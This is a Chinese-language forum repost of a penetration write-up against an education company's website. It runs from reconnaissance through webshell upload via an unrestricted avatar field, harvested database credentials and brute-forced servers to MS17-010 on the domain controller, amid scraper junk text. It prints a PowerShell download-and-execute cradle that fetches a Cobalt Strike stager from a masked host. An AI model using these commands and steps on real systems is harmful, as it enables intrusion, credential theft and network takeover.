中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

2 _& E5 q% H, [8 a2 Y3 n 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 + k- W U4 i9 w4 R+ _ b" u

+ O9 B2 t8 U# [( N3 Y1 {8 R

1 |; K3 Q- _+ ~- }/ Q   ( j5 O1 v- K& T; R( B Q3 Z7 m- Z

) D. \& M. Y8 z' I, d

" |5 Q& t& i' ] 正文6 f* @/ x, g* d$ ~8 w

$ f+ m; K) C; x/ h

6 h' R* d3 w; v1 K0 C1 Y& _8 `2 V/ w   2 g9 D9 Z% i! v5 k

5 T! d" v- Q i# ^

% @! }$ G6 q" O/ s* L+ N! A0 b' z 目标:www.xxxx.com(一家教育机构)
B2 a% t/ v( O0 \3 I+ T4 X, o3 G, `打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 ( A/ V% K& q9 D( ]/ n' |

- A4 ~* {; ^! k$ M8 w# L1 o( ]

' J3 m! c3 c6 O8 L- r vshapes= 0 ^+ G7 M. W3 S

; E/ k, Y3 \7 H

4 ?% W! `5 {' J+ ]) o" I& u 进行了简单的信息搜集
& W7 y+ G U }( O0 }
) n' ]) d- w9 Q' l# {' n, A/ P 4 a% K0 {8 V0 b q) g0 W4 ]

1 s, k8 o& a: R4 {6 l

" L0 L" G' @4 ]/ d% O7 C 子域名搜集5 N5 K& W. r G! e3 A4 M

$ i9 q: T+ z6 Q) P* f# D5 A! \5 N

8 C% o) l. _9 i; V0 [% z7 u: ` vshapes= , `/ }; I2 a6 Q

. O0 U& ]) I' ?1 x5 ~5 G

0 T/ A# m4 [6 V% V% B fofa找资产
1 E' h) N; D- o- c2 `
9 R8 s# |! q2 @# [ x( j+ h# a5 L7 A/ N

9 D L9 w+ b8 e" L: @% l

% K1 u6 G8 \* O' X7 ~. l vshapes=' ?( u% O( w/ i

9 n R2 ?6 M9 _& q, `& v: _5 U

: |! z' H; ~% O2 K ?5 `& m: r+ q 一共七个资产。去重之后只有两个。
]( q) z% ^+ I4 G* Z
; c" G9 ~- Y7 W' w* n: C" T( P ) |' N4 Y" Y1 K- c

; O2 W8 e3 R7 N2 w8 c( v" a1 h ?

; p1 b) [* c' f 目录探测& z5 e) {: N0 U- X- \- G

. H; F2 I4 X8 e

+ Q7 c" r) o3 o- P+ I& H1 k# _" ^9 a vshapes= 2 u% |! t0 r; l8 z( |" F! J

3 s7 E. T8 I2 B. q

8 N1 `& T- J5 r 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
! n( R4 j; x4 s" Q& }
% d" A& \5 r9 v" E5 [6 q! C! U 2 s" s; F2 S. h5 V& R5 z

1 B" Y0 s$ w2 q1 y B

9 x) x% m: ^/ z$ |) A9 S4 N0 @ 我又尝试了通过修改返回包来绕过登录界面. G1 m# U, S' ^6 P( U7 p4 U

5 _1 K4 \9 N* u+ K- ?% W9 }0 \7 Q

5 E5 n* x2 p7 A. q5 c6 [% O vshapes=' G0 t+ V9 r0 f/ i* P. H$ Z

+ X& r( w* c; S( ?

! h# a) g) ~5 i8 q6 I2 R 还是不行,尝试注入无果: }7 A: J- N0 E9 j2 ^7 z# X4 d" |4 K

# e/ }$ ?; p0 U! h7 n7 U. y. r! r

3 Z# m+ {* d: H! {1 N7 j vshapes= + b7 p' h- y6 ^9 j7 J

1 n% _6 |3 E4 `! o }! \- y

8 O2 }( T) ]7 O1 E 不过我目录探测出了一处Spring信息泄露
4 Z3 c5 l( {1 y" n, }% O7 ~
8 f4 D# _3 Z) G; U 0 m1 r- ]; p2 J C

1 _; D# z& @# ]8 o2 b! }

, Y1 ]2 s" k, R) T; Y vshapes= ; K" S |1 u- O8 [9 i% g* ?. M, v

- N) S4 O9 v$ a N

; q" i w& _+ C 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录+ G, j% E& b+ E- t

: g: o% a, S# I4 ?

7 I1 G- a" W& Y" R2 R vshapes= 5 k: H7 G4 j& `+ k8 U: K; t$ f

7 c4 R4 h- c+ v) B, R | h

8 A* q! C7 z" }/ h$ c 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 : }6 {; I2 g2 f, w! M3 _

3 C! u' h$ }7 P& o

8 C3 y! H, x5 N4 O4 w- ^, R/ X$ U vshapes=) t$ z8 ^, f- y/ ]

, q& N% m& w Q3 `% A8 a4 _) p# d

; p7 \5 E4 h0 O$ i$ e3 Z7 Z1 i 获取有些师傅到这一步就手机抓包电脑测了。6 W P5 \5 Q- ~% o& H6 w, R. J

8 t/ f y) [; m5 p

f2 c3 u. U- b; r9 Q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 Y& A$ K3 x ?' ?4 @

/ ?5 b J6 b" y! M

) k, B3 E1 l1 T1 Y' K9 Q* S" D$ T; V& @ 其中在一个公众号发现了小程序,可以进行注册。/ T, ?, N2 [( l2 v

; z/ L3 E# t$ O+ ?1 I! t

+ z! y9 S" E8 n 看到了头像上传,尝试上传获取WebShell & F+ G% Z; L3 b2 v8 F5 q/ g

5 @* F& |) \3 ^! b F* Y- B

" j$ T- ~3 ^ V vshapes=+ k9 C$ n2 I) C7 e" z

5 Y* \& L" a& b: L, g, ?

+ Q/ l4 i4 i/ O; }8 p 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问+ ^* I. Q1 J2 Y/ E3 y3 J

# T; z" R7 a3 f) c( c* {# G

# g' L; j% F$ ^" U% B. h- a- E# ~ vshapes= 1 {7 _, b9 q$ J; @( R) S

. b3 H" I5 f2 C- w! a) @

/ m+ [; }! |- }0 N d1 u: W 然后上了大马/ @6 m1 {' s" s4 e

5 j4 M& v; [- C7 s/ ~' p! v- O% U

& n' I- g' f1 @: n( Q, Q' Z' \6 d vshapes=8 v# L, K' c- b

) |4 u# V. W* F$ N6 ~' |

. o# [* j1 x! N6 C4 v! R, {+ w, y vshapes= 6 y4 S& k8 ~& q% t6 o; a

8 x) l5 E0 p5 p" S- C' a

] o: c3 e/ F- m3 I5 F) @. z& q 通过翻找文件发现数据库账号密码+ g& O1 x. H9 H. c: b+ E$ B# T _

" J# P2 I# A' b/ ]. S

0 n k& O$ ~6 v- `( P3 ?! E vshapes= - i$ i- g7 w: A/ q7 j2 X8 h

8 o; c7 K" N0 n+ o/ d

0 {$ A2 g; \0 ]" H9 c3 w2 e --内网渗透- A# F! _* n; F0 L2 s9 o

! R, \% ]; \2 Q0 q

2 o7 \; D$ ]6 D8 n' R' M- P2 W 直接通过powershell执行 cs上线 % z6 o: _1 X. t/ c2 H4 b' Q

5 ?: s$ E7 Z" d4 B6 m

* P' }7 {( b) T! h+ V; a powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" 6 e) e% q, s- K

M' @1 p7 k0 B, R" m

1 E$ R5 z! J- K* M vshapes= # C; t" P( D |( E* ?& K; b

+ _4 q G3 ~8 `3 _0 R: Y0 N

! a6 h5 ]* k2 y- R/ c( P 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 % @- P8 @" n0 F

0 ?* t4 l5 D5 n# f( q# _- l7 ?

$ u: M, R8 a# e# V: k" r4 v7 b vshapes=% P3 X4 _5 y! c1 C, x! r% Q+ E' k- g

0 T1 n) v6 Y. L$ D' Y

4 z8 I9 a- s: ^! e/ h$ v- z* g: W 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: W4 ~% W9 N! s$ o
5 d) `- t. s9 N
3 \( Z9 x0 r$ t6 M- Q* F7 b1 h$ e. l

3 b' g/ x( D; R, x) H l! }0 U

2 w% p6 G) W6 Z7 W1 j: F ~( Q: R vshapes= 1 O4 j' d: ?; y* i+ D

: b" ~- U: ^/ V$ L, G6 e( u3 f

3 V; l7 x$ P8 p( W" L7 c 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
! q' w, V* {. M. s3 m7 U4 L- k! H! z4 m
+ ?" d8 |/ C+ ^5 C: w2 L* S 0 d% O2 |5 o3 O/ p4 k3 A2 o

6 L3 U |. A" o# Y$ j$ z4 i0 B

5 F, ?2 ? w: R B4 {( c1 ?! v/ m vshapes= 1 Y7 d# A& e. ]! f& `, k" E

2 j. Z6 h# Y# m! a0 D* W+ l

; i& H: ~5 m) G5 K9 T8 ]; e
, O7 M" E. a( C0 I, {
7 K5 x6 ^4 L; y" j/ J$ G" m8 s& i- B; k; l

+ g; ~5 g! V" e: | |2 o

' L/ I7 p6 G3 r   ! S+ G& {; S0 }/ V* F8 w$ V+ o

z5 l8 h4 {9 T

/ U: u- t" X* _, p# |* m6 L7 a 小结# t5 S+ _( I8 _" a* `$ v& R

4 p( X! j$ ]$ L2 K

c4 t0 t0 b; X- O6 `; t3 ^ I7 s  ' J7 }6 R2 l* H! W: S5 K

0 F; G/ ?- v( K2 F u. ^ B

! t: m4 s2 J8 Y7 A1 Q* p. c 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!; T7 G, j: A5 W, X

2 F2 q5 O/ B) p! y! I

' f) H) q# N0 h; |- d7 H5 K( n   2 y- @. U/ y$ B- O* t3 \; ?

- }" e, K" Q$ N) J( W1 h f/ M! Q/ V1 K

& ?$ B# c& Z1 B 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html / E5 B; N; f" ]: u1 p

! t6 D, f; ]3 x

9 Q# J) M! ]; j6 F  8 b) {8 G3 Y0 b3 _3 ?





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2